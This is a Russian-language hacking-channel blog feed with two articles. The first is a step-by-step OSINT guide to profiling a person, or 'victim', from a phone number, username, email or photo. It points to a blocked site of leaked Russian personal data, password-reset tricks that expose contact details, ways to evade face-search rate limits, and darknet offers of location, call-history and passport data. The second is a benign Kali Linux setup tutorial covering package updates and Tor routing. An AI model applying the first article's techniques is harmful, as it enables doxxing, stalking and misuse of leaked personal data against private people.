  &lt;p id=&quot;XWkR&quot; data-align=&quot;center&quot;&gt;Эта та вещь, что специализируется на поиске. Им важно собрать как можно больше информации, чтобы составлять конкуренцию и завлекать аудиторию своими возможностями, это нам и нужно! По своему опыту могу сказать, что даже маленький, никому не нужный поисковик часто может выдать информации больше, чем гиганты. Поэтому, не стоит перебирать, все по своему хороши. &lt;strong&gt;Главное — правильно искать&lt;/strong&gt;, чему сейчас мы и научимся. На примере у нас будет Google, но принцип работы практически везде ничем не отличается. Моделируем ситуацию: нам нужно произвести &lt;strong&gt;точный запрос по номеру &lt;/strong&gt;телефона и отсеять другие похожие варианты. Для этого нам понадобится&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;firstHeading&quot; data-align=&quot;center&quot;&gt;сконструировать такой запрос, используя кавычки: &lt;code&gt;&amp;quot;74952247069&amp;quot;&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;blockquote id=&quot;y2p4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Заметка: &lt;/strong&gt;если вы ищете информацию, которая относится к какой-то стране, (пример: номер телефона) вам следует включить VPN той же страны. Таким образом можно получить больше информации, геопозиция решает! &lt;/blockquote&gt;
  &lt;figure id=&quot;9In8&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/ff/95/ff95fc35-58fa-432e-99c3-45e8892bfc10.png&quot; width=&quot;588&quot; /&gt;
    &lt;figcaption&gt;конкретизация поискового запроса&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;oTex&quot; data-align=&quot;center&quot;&gt;Нам покажет &lt;strong&gt;только 100%-тные упоминания&lt;/strong&gt;. Речь может идти не только о номере, а о другой информации: email, username, пароль, ФИО и пр.&lt;br /&gt;Но что если нам выкидывает кучу сайтов, которые не относятся к нашему запросу? Пример на скриншоте выше, речь о &amp;quot;кто звонил&amp;quot; и прочих. Мы также сможем исключить их по ключевых словах. Это может быть полезно, если у человека о котором вы пытаетесь узнать информацию есть однофамилец, и он занимается публичной деятельностью. Для этого нужно используя &amp;quot;-&amp;quot; написать популярные синонимы к возможным словам и выполнить запрос как ниже:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;59fZ&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;&amp;quot;74952247069&amp;quot; -звонил -узнать -информация -проверить&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;figure id=&quot;BAdM&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/71/f7/71f7a7d3-e31c-42dc-9750-a034d5c295d7.png&quot; width=&quot;550&quot; /&gt;
    &lt;figcaption&gt;исключаем слова из поиска&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Ih45&quot; data-align=&quot;center&quot;&gt;Также существует сайт, который поможет вам сгенерировать правильный запрос для Google. Тут собраны все подобные методы, которые вы также можете использовать, чтобы добиться лучшего результата. &lt;a href=&quot;https://dorksearch.com/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Нажмите для перехода&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;figure id=&quot;nwKM&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/94/32/9432a62a-1b5e-4404-aa0f-bae78fe90f17.png&quot; width=&quot;662&quot; /&gt;
    &lt;figcaption&gt;сайт для создания Google дорков&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ntQd&quot; data-align=&quot;center&quot;&gt;Как я и упоминал, нужно прогонять информацию в разных поисковиках. Я оставлю вам скромный список, но вы можете дополнить его &lt;a href=&quot;https://t.me/QuarNET&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;написав мне в личные&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;4zGJ&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://www.google.com&quot; target=&quot;_blank&quot;&gt;https://intelx.io/&lt;br /&gt;https://searx.tiekoetter.com/&lt;br /&gt;https://search.carrot2.org/&lt;br /&gt;https://www.google.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://www.bing.com/&quot; target=&quot;_blank&quot;&gt;https://www.bing.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://yandex.com/&quot; target=&quot;_blank&quot;&gt;https://yandex.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://duckduckgo.com/&quot; target=&quot;_blank&quot;&gt;https://duckduckgo.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://boardreader.com/&quot; target=&quot;_blank&quot;&gt;http://boardreader.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.dogpile.com/&quot; target=&quot;_blank&quot;&gt;http://www.dogpile.com/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://search.creativecommons.org/&quot; target=&quot;_blank&quot;&gt;https://search.creativecommons.org/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://www.startpage.com/&quot; target=&quot;_blank&quot;&gt;https://www.startpage.com/&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;eTNt&quot; data-align=&quot;center&quot;&gt;Поиск по username&lt;/h2&gt;
  &lt;p id=&quot;U97W&quot; data-align=&quot;center&quot;&gt;Некоторые пользователи используют один и тот же ник на сайтах, что поможет нам собрать больше информации. Для этой цели существует много ботов, но именно этот используется осинтерами больше всего: &lt;a href=&quot;https://t.me/maigret_osint_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;@maigret_osint_bot&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;5xPw&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e3/f9/e3f9a137-bead-45df-987a-c19d1f25fe68.png&quot; width=&quot;674&quot; /&gt;
    &lt;figcaption&gt;поиск в боте Maigret&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;lya0&quot; data-align=&quot;center&quot;&gt;Как заявляют разработчики, поиск производится на 3.000 сайтах.&lt;br /&gt;Бот может часто лежать, поэтому советую установить &lt;a href=&quot;https://github.com/soxoj/maigret&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;утилиту&lt;/strong&gt;&lt;/a&gt; на которой он основан сразу к себе в машину. Таким образом поиск будет более точным, потому что прокси бота частенько залетают в &lt;strong&gt;&lt;s&gt;blacklist&lt;/s&gt; &lt;/strong&gt;и не сканируют должным образом.&lt;br /&gt;Для этой цели также можно использовать поисковики, таким образом мы, вероятно, сможем получить кешированные страницы и просмотреть их копию.&lt;br /&gt;Также не стоит забывать, что многие используют &lt;strong&gt;username в почте&lt;/strong&gt;.&lt;br /&gt;&lt;a href=&quot;https://t.me/mailcat_s_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Есть бот&lt;/strong&gt;&lt;/a&gt;, который переберёт почтовые домены в автоматическом режиме.&lt;br /&gt;Его тоже можно установить себе на компьютер и &lt;a href=&quot;https://github.com/sharsil/mailcat&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;сканировать эффективнее&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;figure id=&quot;ATkT&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c4/34/c434ad6c-ee85-4118-a701-393072c367f7.png&quot; width=&quot;713.7134831460675&quot; /&gt;
    &lt;figcaption&gt;поиск почты используя MailCat&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;nfHG&quot; data-align=&quot;center&quot;&gt;Заметка: попробуйте восстановить пароль от аккаунта на найденных сайтах. Вам с огромной вероятностью покажет часть почты/номера телефона.&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;R4Ze&quot; data-align=&quot;center&quot;&gt;Поиск по номеру телефона&lt;/h2&gt;
  &lt;p id=&quot;r5aF&quot; data-align=&quot;center&quot;&gt;Имея на руках номер, вы открываете себе возможность устроить полный шпионаж, все зависит от размера вашего кошелька, обговорим это ниже=)&lt;br /&gt;Но что если весь ваш доход — карманные деньги от родителей? Не волнуйтесь, для вас тоже есть куча бесплатных возможностей. Например, можно воспользоваться сайтом, который хранит в себе терабайты русских утечек.&lt;br /&gt;Для доступа нужно будет воспользоваться средствами смены IP, потому что власти не разделяют наши интересы и заблокировали ресурс=) &lt;a href=&quot;https://saverudata.online/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Перейти на сайт&lt;/strong&gt;&lt;/a&gt;.&lt;br /&gt;Это самый мощный и бесплатный инструмент по России. Если вы заказывали еду, ваши адреса, скорее всего, дополняют базу данных, советую проверить.&lt;/p&gt;
  &lt;figure id=&quot;Q4nw&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ef/df/efdf35c2-a5cb-4e67-95a7-169433742724.png&quot; width=&quot;718.1530782029951&quot; /&gt;
    &lt;figcaption&gt;поиск на сайте saverudata&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Hfi4&quot; data-align=&quot;center&quot;&gt;Что делать если цель из другой страны? Попробуйте воспользоваться &lt;a href=&quot;https://getcontact.com/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;GetContact&lt;/strong&gt;&lt;/a&gt;. Это приложение является огроменной базой информации о номерах, но ни в коем случае не устанавливайте это себе на личное устройство! Принцип его работы основан на том, чтобы добывать данные со своих пользователей. &lt;br /&gt;Да-да, вы его установили и одновременно слили всю свою контактную книгу=)&lt;br /&gt;Гениальный, коварный ход, но для наших целей является золотым звеном. Воспользуйтесь эмуляторами для того, чтобы не стать жертвой самостоятельно.&lt;/p&gt;
  &lt;figure id=&quot;H5hd&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/59/46/59469b5e-6020-4516-ab40-5cc025d33e81.png&quot; width=&quot;696&quot; /&gt;
    &lt;figcaption&gt;поиск Getcontact в эмуляторе&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;TrVQ&quot; data-align=&quot;center&quot;&gt;Существует бот, который производит поиск по базе &lt;em&gt;GetContact&lt;/em&gt;. &lt;a href=&quot;https://t.me/getcontact_real_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Перейти&lt;/strong&gt;&lt;/a&gt;.&lt;br /&gt;&lt;em&gt;Бесплатно можно совершить 7 запросов, после: &lt;/em&gt;10 запросов = 100 руб&lt;em&gt;.&lt;/em&gt;&lt;/p&gt;
  &lt;figure id=&quot;4kTW&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/36/cf/36cf7815-58ef-417b-99d7-a820d1b635d1.png&quot; width=&quot;703.0856423173803&quot; /&gt;
    &lt;figcaption&gt;telegram бот для поиска по базе Getcontact&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;xXLS&quot; data-align=&quot;center&quot;&gt;Для более глубокого результата, попробуйте добавить номер жертвы в &lt;code&gt;Telegram/WhatsApp/Viber/Signal&lt;/code&gt;. Есть шанс получить фотографии &amp;amp; ФИО.&lt;br /&gt;А что если у вас есть деньги? Тогда ваши возможности не ограничиваются, вы сможете узнать местоположение цели/историю звонков/паспортные данные и многое другое! Естественно, это противоречит законодательству многих стран и автор осуждает подобные методы добычи информации. Стоит упомянуть, что на &lt;code&gt;15/04/2023&lt;/code&gt; начали закручивать гайки, сейчас рынок намного сократился, все DarkNet комьюнити наблюдают над ситуацией. Активные позиции все-таки есть, и я продемонстрирую вам скриншот, чтобы вы знали цену своим данным.&lt;br /&gt;Ссылки не оставляю. Вспомните о чём статья и реализуйте свои навыки=)&lt;/p&gt;
  &lt;figure id=&quot;Z3pY&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5d/f2/5df2a058-717f-4407-9629-4df091e2d0d7.png&quot; width=&quot;765.4158273381295&quot; /&gt;
    &lt;figcaption&gt;теневые услуги и расценки&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;l9tt&quot; data-align=&quot;center&quot;&gt;Поиск по Email&lt;/h2&gt;
  &lt;p id=&quot;raAf&quot; data-align=&quot;center&quot;&gt;Мыло = ключ к всей информации, поэтому обязательно проверяйте его на утечки пароля. Для этого используются такие сервисы как: &lt;a href=&quot;https://t.me/PasswordSearchBot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;PasswordSearch&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://intelx.io/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;intelx&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;http://leakcheck.io&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;leackcheck&lt;/strong&gt;&lt;/a&gt;. На самом деле их намного больше, но это одни из самых мощных.&lt;/p&gt;
  &lt;figure id=&quot;a91l&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/01/83/018337bf-6890-4518-a82c-098893a3824a.png&quot; width=&quot;720&quot; /&gt;
    &lt;figcaption&gt;результат проверки почты на утечки&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ssRo&quot; data-align=&quot;center&quot;&gt;Также существует сервис, который найдёт соц. сети по email — &lt;a href=&quot;https://seon.io/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Seon&lt;/strong&gt;&lt;/a&gt;. Он бесплатен, имеет приятный вывод информации и не требует авторизации.&lt;/p&gt;
  &lt;figure id=&quot;4nkD&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/39/7f/397fd43a-d1f2-462a-9c04-5d155f61d972.png&quot; width=&quot;733&quot; /&gt;
    &lt;figcaption&gt;поиск соц. сетей используя Seon&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;srj4&quot; data-align=&quot;center&quot;&gt;Поиск по лицу&lt;/h2&gt;
  &lt;p id=&quot;sp5U&quot; data-align=&quot;center&quot;&gt;Для этой задачи я использую &lt;a href=&quot;https://pimeyes.com/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;PimEyes&lt;/strong&gt;&lt;/a&gt;. Превосходный сервис который предоставляет нам 3 бесплатные попытки в 24ч., но посредством смены IP&amp;amp;FingerPrint можно легко обойти это ограничение и пользоваться без ограничений. К слову, регистрация не требуется. На все найденные изображения прилагается источник. Это действие может быть полезно для дополнительного сбора информации, когда мы уже имеем на руках фотографию цели.  &lt;/p&gt;
  &lt;figure id=&quot;Ne3G&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/16/b4/16b40b12-7823-46f3-8678-a823edd89e0a.png&quot; width=&quot;646&quot; /&gt;
    &lt;figcaption&gt;результат поиска в PimEyes&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;HGU9&quot; data-align=&quot;center&quot;&gt;Так же есть неплохой аналог — &lt;a href=&quot;https://search4faces.com/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Search4Faces&lt;/strong&gt;&lt;/a&gt;, он тоже бесплатен, но ищет по соц. сетям. Я заметил что его результаты в некоторых ситуациях слегка лучше, поэтому, в идеале использовать оба сервиса для лучшего исхода.&lt;/p&gt;
  &lt;figure id=&quot;lw5w&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/aa/7a/aa7aa09b-3aca-4b2a-84dd-679fcff23aa8.png&quot; width=&quot;677.2726326742976&quot; /&gt;
    &lt;figcaption&gt;результат поиска в search4faces&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;eqf0&quot; data-align=&quot;center&quot;&gt;Итоги&lt;/h2&gt;
  &lt;p id=&quot;x4SN&quot; data-align=&quot;center&quot;&gt;В этой статье я затронул только самое-самое основное, но этого достаточно, чтобы начать свой путь. Как я и упоминал, OSINT — очень увлекательная сфера, которая ещё не раз будет на нашем канале, но в других направлениях=) Если у вас есть какие-то дополнения/интересные сервисы, &lt;a href=&quot;https://t.me/QuarNET&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;сообщите мне в личные&lt;/strong&gt;&lt;/a&gt;, я добавлю их в следующий материал. Всем здоровья и мирного неба над головой!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</content></entry><entry><id>hack2day:dSqinEJlbh4</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/dSqinEJlbh4?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>Kali Linux: готовим систему после установки на VM к работе.</title><published>2023-04-13T20:23:34.713Z</published><updated>2023-04-13T22:10:46.749Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/26/1b/261b4a6c-398c-455a-9e34-d9a082df2cc3.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/c4/ba/c4baf85e-d0e4-4772-b590-79cbfdd59c13.png&quot;&gt;Приветствую. В прошлой части мы выполнили установку Kali Linux на виртуальную машину. Сегодня же, мы установим несколько важных утилит, которые нам 100% придётся использовать в дальнейшем. Выучим на практике много новых команд, затронем кастомизацию системы и сделаем ещё один огромный шаг вперёд. Приятного ознакомления!
Не забывайте подписываться на наш канал и вступать в чатик.

↓↓↓
ПОДПИСАТЬСЯ | ВСТУПИТЬ В ЧАТ</summary><content type="html">
  &lt;p id=&quot;WOn4&quot; data-align=&quot;center&quot;&gt;Приветствую. В прошлой части мы выполнили установку Kali Linux на виртуальную машину. Сегодня же, мы установим несколько важных утилит, которые нам 100% придётся использовать в дальнейшем. Выучим на практике много новых команд, затронем кастомизацию системы и сделаем ещё один огромный шаг вперёд. Приятного ознакомления!&lt;br /&gt;Не забывайте подписываться на наш канал и вступать в чатик.&lt;br /&gt;&lt;br /&gt;↓↓↓&lt;br /&gt;&lt;strong&gt;&lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;ПОДПИСАТЬСЯ &lt;/a&gt;| &lt;a href=&quot;https://t.me/hack2day_chat&quot; target=&quot;_blank&quot;&gt;ВСТУПИТЬ В ЧАТ&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;59PX&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;ifrw&quot; data-align=&quot;center&quot;&gt;Базовое обновление пакетов&lt;/h2&gt;
  &lt;p id=&quot;Lpvq&quot; data-align=&quot;center&quot;&gt;Kali с печки не устанавливает/обновляет утилиты, чтобы сделать установочный образ наиболее лёгким по весу. Это действие нужно проделывать каждому, кто только установил Kali. Впишите эту команду в терминал:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;XTA4&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;mXqR&quot; data-align=&quot;center&quot;&gt;У вас запросит пароль от учётной записи, который мы указывали при первом запуске. Это будет происходить всегда, когда мы захотим использовать команду &amp;quot;sudo&amp;quot;. Она выполняет действия на системном уровне и требует авторизации.&lt;br /&gt;Кстати, ввод пароля &amp;quot;слепой&amp;quot;, вы не будете видеть вводимые символы.&lt;br /&gt;У вас, скорее всего, запросит подтверждение на установку. На этом моменте нужно написать в терминале букву &amp;quot;y&amp;quot; и нажать &amp;quot;Enter&amp;quot;. (y=yes, n=no)&lt;/p&gt;
  &lt;blockquote id=&quot;DGMO&quot; data-align=&quot;center&quot;&gt;Двойной амперсанд (&amp;amp;&amp;amp;) используется для запуска нескольких задач в одной строке. В данном случае, мы обратились к системе и сказали ей: слушай, сначала посмотри что у меня вообще установлено, проверь, есть ли на него новые обновления. Если что-то нашлось — обнови самостоятельно.&lt;/blockquote&gt;
  &lt;figure id=&quot;k0T4&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c4/ba/c4baf85e-d0e4-4772-b590-79cbfdd59c13.png&quot; width=&quot;643&quot; /&gt;
    &lt;figcaption&gt;выполнение команды для обновления пакетов&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;XxvJ&quot; data-align=&quot;center&quot;&gt;Кастомизация&lt;/h2&gt;
  &lt;p id=&quot;AE3L&quot; data-align=&quot;center&quot;&gt;Kali — сам по себе очень красивый дистрибутив, но иногда хочется сделать систему уникальной, более приятной для глаз. Это абсолютно не проблема, ведь существуют тысячи различных кастомизаций. Пользователи создают их самостоятельно и делятся ими на различных сайтах. Как пример: &lt;a href=&quot;https://www.xfce-look.org/browse/&quot; target=&quot;_blank&quot;&gt;нажимайте&lt;/a&gt;=)&lt;br /&gt;Тут вам и аниме девочки, и копии Windows для тех, кому сложно привыкнуть..&lt;br /&gt;Да проще назвать то, чего там нет! К сожалению, я не смогу показать процесс установки тут, но оставлю вам достойный видеоролик, на котором пошагово демонстрируется процесс. &lt;a href=&quot;https://www.youtube.com/watch?v=NRDqNjKsU0w&quot; target=&quot;_blank&quot;&gt;https://www.youtube.com/watch?v=NRDqNjKsU0w&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;vldK&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bb/84/bb84393e-3f9a-4f4b-8fde-cf06eee0b32c.png&quot; width=&quot;693.2992213570635&quot; /&gt;
    &lt;figcaption&gt;скриншот сайта с пользовательскими интерфесами xfce&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;4OQm&quot; data-align=&quot;center&quot;&gt;Установка MullVad VPN (.deb приложений)&lt;/h2&gt;
  &lt;p id=&quot;6MHU&quot; data-align=&quot;center&quot;&gt;VPN — неотложная часть, ведь при сканировании сеток/сайтов и прочего, наш настоящий IP с большой вероятностью попадёт в backlist/будет кидаться капчей. Я использую MullVad и этом примере покажу, как его установить. При переходе на сайт нас встречают кнопки загрузки. Нам нужно выбрать, какой тип файла нам больше подходит, &amp;quot;.deb&amp;quot; или &amp;quot;.rpm&amp;quot;. Для систем на Debian (Kali относится к ним) нужно выбирать расширение &amp;quot;.deb&amp;quot;, нам подходит этот вариант. &lt;/p&gt;
  &lt;blockquote id=&quot;bc0S&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Заметка&lt;/strong&gt;: тип файла &amp;quot;.deb&amp;quot;, практически тоже самое, что и &amp;quot;.exe&amp;quot; в Windows. Его используют для установки приложений в среде Linux.&lt;/blockquote&gt;
  &lt;figure id=&quot;cbZO&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/14/e5/14e5a5d6-86e5-4f4f-8b81-85e1aeb6c7f0.png&quot; width=&quot;695.0037267080745&quot; /&gt;
    &lt;figcaption&gt;загрузочная страница MullVad&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;HVFo&quot; data-align=&quot;center&quot;&gt;После полной скачки файла нам нужно открыть терминал и перейти в папку, где находится наш скачанный файл. Это делается командой &amp;quot;&lt;code&gt;cd&lt;/code&gt;&amp;quot;. К примеру, обычная папка с браузерными загрузками называется &amp;quot;Downloads&amp;quot; и чтобы перейти в неё с помощью терминала, нужно выполнить такую простую команду: &lt;code&gt;cd Downloads/&lt;/code&gt;&lt;br /&gt;Написали? Теперь можно проверить, туда ли мы попали. Для этого существует самая простенькая команда — &amp;quot;&lt;code&gt;ls&lt;/code&gt;&amp;quot;. Она покажет все файлы в папке, в которой мы сейчас находимся. Я обнаружил файл который мы качали, а это значит что все получилось, можно переходить к установке приложения.&lt;/p&gt;
  &lt;blockquote id=&quot;YsC4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Совет&lt;/strong&gt;: вы можете нажимать &amp;quot;TAB&amp;quot; и вам будут предлагать возможные названия папки/файла, это очень удобно и будет часто использоваться вами.&lt;/blockquote&gt;
  &lt;figure id=&quot;eV4M&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ae/77/ae77ee6f-b749-457f-afd9-ad190e1bc870.png&quot; width=&quot;729&quot; /&gt;
    &lt;figcaption&gt;команды в терминале&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;9uIo&quot; data-align=&quot;center&quot;&gt;Для установки любого &amp;quot;.deb&amp;quot; приложения используйте эту команду:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;ITxU&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;sudo dpkg -i app.deb&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;jDCd&quot; data-align=&quot;center&quot;&gt;Вместо &amp;quot;app.deb&amp;quot; — название вашего приложения. В моём случае это длинное название MullVad, которое я ввожу используя клавишу &amp;quot;TAB&amp;quot; для быстроты.&lt;br /&gt;Так как мы использовали команду &amp;quot;sudo&amp;quot;, нам нужно ввести наш пароль.&lt;br /&gt;После этого в терминале начнётся установка, а у нас появится приложение.&lt;br /&gt;Найти его можно нажав на иконку в верхнем левом углу. (скриншот прилагаю)&lt;/p&gt;
  &lt;blockquote id=&quot;FJkH&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Заметка&lt;/strong&gt;: команда &amp;quot;sudo&amp;quot; выполяет команду используя режим &amp;quot;суперпользователя&amp;quot;, вы будете часто её использовать при работе с Linux.&lt;/blockquote&gt;
  &lt;figure id=&quot;5CAp&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d3/4a/d34a4434-79d5-4eba-b882-0863d385b9d7.png&quot; width=&quot;632&quot; /&gt;
    &lt;figcaption&gt;проверка наличия приложения в поисковом меню&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;Gk1N&quot; data-align=&quot;center&quot;&gt;Полная &amp;quot;TOR&amp;#x60;ификация&amp;quot; трафика&lt;/h2&gt;
  &lt;p id=&quot;5k9J&quot; data-align=&quot;center&quot;&gt;Когда нужно укрепить защиту для визита какого-то места, нам потребуется воспользоваться TOR. Многие не знают, но это не просто браузер.&lt;br /&gt;Это целая сеть, через которую можно пропустить весь трафик, она даст нам больше свободы и уверенности в Интернете. Есть далеко не один способ как это сделать, но я покажу один из самых лёгких. Сразу скажу, полностью доверять&lt;em&gt;&lt;br /&gt;&lt;strong&gt;&lt;u&gt;не стоит&lt;/u&gt;&lt;/strong&gt;&lt;/em&gt;, каким-то образом может что-то слететь, поэтому, используйте VPN c включенной функцией &amp;quot;KillSwitch&amp;quot; чтобы наш основной IP не утёк. К слову, я ранее не замечал каких-то &amp;quot;внезапных слётов&amp;quot;, но перестраховаться нужно. Для установки мы выучим новую команду — &amp;quot;&lt;code&gt;git&lt;/code&gt;&amp;quot;. Она в основном используется для скачки утилит из GitHub, (простыми словами) должна быть установлена в системе по умолчанию после обновлений всех пакетов. (первый шаг)&lt;br /&gt;Для установки &amp;amp; запуска TOR пропишите эти команды в терминале:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;621p&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;git clone https://github.com/ruped24/toriptables2&lt;br /&gt;cd toriptables2/&lt;br /&gt;sudo mv toriptables2.py /usr/local/bin/&lt;br /&gt;cd&lt;br /&gt;toriptables2.py -h&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
